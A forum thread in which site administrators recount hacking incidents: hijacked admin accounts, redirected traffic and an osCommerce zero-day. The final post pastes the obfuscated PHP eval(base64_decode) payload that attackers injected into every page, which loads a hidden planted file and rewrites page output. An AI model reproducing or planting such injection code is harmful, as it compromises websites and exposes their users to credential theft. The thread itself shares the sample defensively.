Your 'hacking' experiences.

Crayo

Active member
This thread is inspired by this one.

How many of you have undergone experiences where some type of hacking has directly effected your site? It has to be one of the most worrying experience almost everyone eventually gets confronted with.

If you have never been hacked, has anything ever effected your forums livelihood? Has you undergone an experience where at one point you thought your forum was gone forever?
 

ManagerJosh

Well-known member
This thread is inspired by this one.

How many of you have undergone experiences where some type of hacking has directly effected your site? It has to be one of the most worrying experience almost everyone eventually gets confronted with.

If you have never been hacked, has anything ever effected your forums livelihood? Has you undergone an experience where at one point you thought your forum was gone forever?

Haven't dealt with a security incident/data breach yet for myself, but I try to do a pen test on my site about once to twice a year to see if there are any holes we missed.
 

Adam Howard

Well-known member
1) Troll hacker

Hacker logged in as me, pretended to be me and disrespected everyone to the point where people were thinking of leaving, and than made an announcement that the site was closing & told people they'd be better off going to X site.

The hacker then proceeded to continue to pretend to be me... Claiming the site was hacked, that it wasn't really me.... But he continued to trash talk everyone. Made announcement that the site had been sold and pretended to be someone else. Proceeded to retract that announcement and continued to "mind f*ck" people.

So by the time I (me, the real me) came back ...... Nothing I could say had much credit.

2) Script kiddie

Someone accessed our file server and re-directed traffic. The flaw they found actually prompted vBulletin to release a security update.

3) Web Host (current resolving issue)

http://xenforo.com/community/threads/having-a-bad-day.45625/
 

Deebs

Well-known member
I got caught hacking when I was 18 working as a data inputter for the largest mortgage company in the UK at the time (running on PCs and not mainframes). They offered me a job in "The Computer Room" :)
 

AdamD

Well-known member
As for my own experience, not been hacked per se', but one of my admins accounts was taken over and it's only because I was online and noticed his IP was in a different part of the USA, did I block it and the account.

Oddly enough, said Admin threw a tantrum when I asked him to check his PC for trojans etc, needless to say, he never came back as staff.
 

MattW

Well-known member
Only time I've every suffered anything was back in 2009, when I was using OSCommerce for our online shop, and on phpBB3.

messages screen.JPG


It was asking members to re-enter their username and password via a separate page

screen.jpg


They got it via a zero day in OSCommerce, and used the phpBB3 portal page to store their files as it had a 777 directory in there

http://forums.oscommerce.com/topic/345957-evalbase64-decode-hack/
 

MattW

Well-known member
Looks.. legit... :cautious:
Tell me about it. I was notified about it from one of my mods......

just tried to delete the messages in my inbox and it comes up with a screen asking to authenticate :wtf:

Matt ...................

This is what was added into each page
PHP:
<span class="syntaxhtml"><br /><span class="syntaxdefault"><?php </span><span class="syntaxcomment">/**/</span><span class="syntaxkeyword">eval(</span><span class="syntaxdefault">base64_decode</span><span class="syntaxkeyword">(</span><span class="syntaxstring">'aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT<br />0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS96MjJzZS9wdWJsaWNfaHRtbC9mb3J1bS9zdHlsZXMvcHJvc2lsdmVyL3RlbXBsYXRlL3BvcnRhbC9ibG9jay9kb25hdGlvbi9DVl<br />Mvc3R5bGUuY3NzLnBocCcpKXtpbmNsdWRlX29uY2UoJy9ob21lL3oyMnNlL3B1YmxpY19odG1sL2ZvcnVtL3N0eWxlcy9wcm9zaWx2ZXIvdGVtcGxhdGUvcG9ydGFsL2Jsb2<br />NrL2RvbmF0aW9uL0NWUy9zdHlsZS5jc3MucGhwJyk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmIWZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7aWYoIWZ1bmN0aW9uX2<br />V4aXN0cygnZ3pkZWNvZGUnKSl7ZnVuY3Rpb24gZ3pkZWNvZGUoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCl7JFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0<br />E0OTdCRDg2Qj1vcmQoc3Vic3RyKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsMywxKSk7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MT0xMD<br />skUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxPTA7aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY0KXskUjBENTQyMzZEQTIwNTk0RUMxM0<br />ZDODFCMjA5NzMzOTMxPXVucGFjaygndicsc3Vic3RyKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsMTAsMikpOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MU<br />IyMDk3MzM5MzE9JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMVsxXTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKz0yKyRSMEQ1NDIzNkRBMj<br />A1OTRFQzEzRkM4MUIyMDk3MzM5MzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImOCl7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MT<br />1zdHJwb3MoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCxjaHIoMCksJFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSkrMTt9aWYoJFI2QjZFOT<br />hDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiYxNil7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MT1zdHJwb3MoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4Mk<br />YwNjczMjg2OCxjaHIoMCksJFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSkrMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiYyKXskUj<br />YwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKz0yO30kUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPWd6aW5mbGF0ZShzdWJzdHIoJFIyMEZENjVFOU<br />M3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSk7aWYoJFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mz<br />09PUZBTFNFKXskUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPSRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4Njg7fXJldHVybiAkUkM0QTVCNUUzMT<br />BFRDRDMzIzRTA0RDcyQUZBRTM5RjUzO319ZnVuY3Rpb24gZGdvYmgoJFJEQTNFNjE0MTRFNTBBRUU5NjgxMzJGMDNEMjY1RTBDRil7SGVhZGVyKCdDb250ZW50LUVuY29kaW<br />5nOiBub25lJyk7JFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MD1nemRlY29kZSgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKTtpZihwcmVnX2<br />1hdGNoKCcvXDxib2R5L3NpJywkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKSl7cmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPGJvZHlbXlw+XSpcPikvc2knLC<br />ckMScuZ21sKCksJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCk7fWVsc2V7cmV0dXJuIGdtbCgpLiRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOT<br />A7fX1vYl9zdGFydCgnZGdvYmgnKTt9fX0='</span><span class="syntaxkeyword">)); </span><span class="syntaxdefault">?><br /></span></span>
 
Top